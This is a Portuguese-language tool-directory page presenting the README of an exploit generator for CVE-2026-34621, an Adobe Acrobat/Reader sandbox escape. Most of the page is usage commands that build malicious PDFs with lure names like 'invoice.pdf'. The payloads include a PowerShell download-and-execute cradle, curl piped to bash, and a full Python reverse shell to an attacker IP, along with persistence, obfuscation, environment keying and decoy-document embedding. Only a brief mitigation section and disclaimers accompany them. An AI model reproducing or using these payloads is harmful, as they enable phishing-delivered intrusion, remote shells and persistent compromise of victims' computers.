Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve_2026_34621_advanced — Um gerador de exploits sofisticado e multiplataforma para **CVE-2026-34621** – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS. | Kitploit
Ferramentas/GitHubGitHub/null200ok/cve_2026_34621_advanced
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Um gerador de exploits sofisticado e multiplataforma para **CVE-2026-34621** – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.

Ver Repositório
135há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gerador de Exploit Avançado CVE-2026-34621

Python 3.7+ License

Um gerador de exploits sofisticado e multiplataforma para CVE-2026-34621 – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.

⚠️ AVISO IMPORTANTE
Esta ferramenta destina-se apenas a pesquisas de segurança autorizadas e testes de penetração.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal. O autor não assume nenhuma responsabilidade por uso indevido.


📋 Índice

  • Visão Geral
  • Recursos
  • Instalação
  • Início Rápido
  • Exemplos de Uso
    • Comandos para Windows
    • Comandos para macOS
    • Teste em Dispositivos Móveis
  • Opções de Linha de Comando
  • Como Funciona
  • Versões Afetadas
  • Mitigação
  • Contribuição
  • Licença

  • 🔍 Visão Geral

    CVE-2026-34621 é uma vulnerabilidade de dia zero no Adobe Acrobat e Reader que permite a um atacante:

    1. Poluir o protótipo do objeto JavaScript no mecanismo da Adobe.
    2. Contornar a sandbox de segurança.
    3. Executar comandos arbitrários do sistema na máquina da vítima.

    Este gerador cria um arquivo PDF malicioso que, quando aberto em uma versão vulnerável do Adobe Reader, executa automaticamente um payload adaptado ao sistema operacional da vítima.

    Plataformas de Destino Suportadas:

    • ✅ Windows (execução arbitrária de código completa)
    • ✅ macOS (execução arbitrária de código completa)
    • ❌ Android / iOS (não vulneráveis – apenas fallback de demonstração)

    ✨ Recursos

    CategoriaCapacidades
    Payloads MultiplataformaDetecta automaticamente o SO e seleciona o método de execução de comandos apropriado para Windows ou macOS.
    Múltiplos Vetores de Execuçãocmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
    Payloads em EstágiosBaixa e executa payloads de segundo estágio a partir de uma URL remota.
    PersistênciaInstala chave Run no registro (Windows) ou LaunchAgent (macOS).
    Técnicas de EvasãoTrês níveis de ofuscação de JavaScript, chaveamento por ambiente, atrasos de execução, código polimórfico.
    Incorporação em PDF IscaMescla o exploit em um PDF de aparência legítima (requer PyPDF2).
    Múltiplos GatilhosOpenAction, ação de abertura de página ou JavaScript em nível de documento.
    Relatórios AbrangentesRelatórios em HTML, TXT e JSON detalhando a configuração do payload.

    📦 Instalação

    1. Clonar o Repositório

    root@kitploit:~
    git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
    cd CVE-2026-34621-Exploit
    

    2. (Opcional) Criar um Ambiente Virtual

    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate      # Linux/macOS
    venv\Scripts\activate         # Windows
    

    3. Instalar Dependências

    O script principal usa apenas a biblioteca padrão do Python. Para o recurso de mesclagem de PDF isca, instale o PyPDF2:

    root@kitploit:~
    pip install PyPDF2
    

    🚀 Início Rápido

    Gere um PDF básico que abre a calculadora no Windows e no macOS:

    root@kitploit:~
    python3 cve_2026_34621_advanced.py -o test.pdf
    

    Isso cria:

    test.pdf – O arquivo PDF malicioso.

    test_report.html – Relatório HTML detalhado.

    test_report.txt – Resumo em texto simples.

    test_config.json – Exportação da configuração em JSON.

    💻 Exemplos de Uso

    Comandos para Windows

    1-Cenário Comando

    A-Popup básico do calc.exe

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
    

    Reverse shell com PowerShell

    root@kitploit:~
    python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
    

    Payload em estágios com persistência

    root@kitploit:~
    python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
    

    Chaveamento por ambiente (executar apenas em "SALES-PC")

    root@kitploit:~
    python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
    

    Com nível de ofuscação 2 e atraso de 10 segundos

    root@kitploit:~
    python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
    

    Comandos para macOS

    2-Cenário Comando

    Abrir a Calculadora

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
    

    Baixar e executar script

    root@kitploit:~
    python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
    

    Reverse shell via Python

    root@kitploit:~
    python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    

    Persistência via LaunchAgent

    root@kitploit:~
    python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
    

    Incorporação em um PDF Isca

    root@kitploit:~
    python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
    

    3-Nota sobre Testes em Dispositivos Móveis

    O script em si é executado em desktop (Windows/macOS/Linux) para gerar o PDF. O PDF gerado pode ser aberto em dispositivos Android ou iOS, mas:

    As versões móveis do Adobe Acrobat Reader não são vulneráveis ao CVE-2026-34621.

    O payload acionará um fallback de demonstração benigno (abre uma URL ou exibe um alerta) em vez de executar comandos do sistema.

    📖 Opções de Linha de Comando

    Opção Descrição

    -o, --output ARQUIVO Obrigatório. Nome do arquivo PDF de saída.

    --win CMD Comando do Windows a executar (padrão: calc.exe).

    --mac CMD Comando do macOS a executar (padrão: open /System/Applications/Calculator.app).

    --stage URL URL para baixar o payload de segundo estágio.

    -p, --persistence Instala mecanismo de persistência (Registry/LaunchAgent).

    -O, --obfuscate NÍVEL Nível de ofuscação de JavaScript (0=nenhum, 1=básico, 2=intermediário, 3=avançado).

    -d, --delay SEGUNDOS Atrasa a execução pelo número de segundos especificado.

    -k, --key NOME_DO_HOST Chaveamento por ambiente – executa apenas em hostname correspondente.

    -l, --lure PDF Caminho para um PDF legítimo a ser usado como isca (mescla o exploit).

    --trigger TIPO Vetor de gatilho: openaction, pageopen ou doclevel.

    --no-reports Pula a geração de relatórios HTML/TXT/JSON.

    --seed N Define a semente aleatória para geração polimórfica reproduzível.

    ⚙️ Como Funciona

    Cadeia de Ataque

    Poluição de Protótipo:

    O JavaScript incorporado modifica Object.prototype para injetar propriedades maliciosas (__trusted, privileged, etc.). Isso confunde o limite de confiança do mecanismo JavaScript da Adobe.

    Escalonamento de Contexto

    Devido ao protótipo poluído, o mecanismo trata incorretamente o JavaScript não confiável do documento como se estivesse sendo executado em um contexto privilegiado.

    Acesso a APIs Privilegiadas

    O script agora pode chamar APIs restritas como app.launchURL, util.readFileIntoStream e app.trustedFunction.

    Fuga da Sandbox

    Essas APIs permitem acesso ao sistema de arquivos e execução de processos fora da sandbox da Adobe.

    Execução Arbitrária de Código

    O script executa o comando do atacante usando métodos específicos do SO:

    Windows: cmd.exe /c, PowerShell ou WScript.Shell.

    macOS: manipulador de URL do Terminal.app ou osascript.

    Níveis de Ofuscação

    Nível Descrição

    0 Sem ofuscação – JavaScript simples e legível.

    1 Literais de string convertidos para String.fromCharCode, nomes de variáveis aleatorizados.

    2 Nível 1 + injeção de código morto e comentários inúteis.

    3 Script inteiro codificado em base64 e envolvido em eval(atob(...)), depois re-ofuscado.

    🛡️ Versões Afetadas

    Produto Trilha Versões Vulneráveis Versão Corrigida

    Adobe Acrobat DC Contínua ≤ 26.001.21367 26.001.21411

    Adobe Acrobat Reader DC Contínua ≤ 26.001.21367 26.001.21411

    Adobe Acrobat 2024 Clássica ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)

    🛠️ Mitigação

    Atualize Imediatamente: Aplique as atualizações de segurança mais recentes da Adobe.

    Desative o JavaScript no Adobe Reader: Editar → Preferências → JavaScript → desmarque "Habilitar JavaScript do Acrobat" (observação: isso quebra algumas funcionalidades do PDF).

    Use Visualizadores de PDF Alternativos: Considere usar navegadores ou visualizadores de terceiros que não sejam afetados.

    🤝 Contribuição

    Contribuições são bem-vindas, mas observe:

    Todas as solicitações de pull devem ser para pesquisa defensiva, melhorias de detecção ou aprimoramentos de relatórios.

    Não aceitamos contribuições que aumentem a capacidade ofensiva da ferramenta além do necessário para testes legítimos.

    Para contribuir:

    Faça um fork do repositório.

    Crie um branch de funcionalidade.

    Envie uma solicitação de pull com uma descrição clara das alterações.

    📄 Licença

    Este projeto é fornecido apenas para fins educacionais e de testes de segurança autorizados.

    Ao usar este software, você concorda que é responsável por cumprir todas as leis e regulamentos aplicáveis.

    O autor isenta-se de toda responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.

    Baixar ferramenta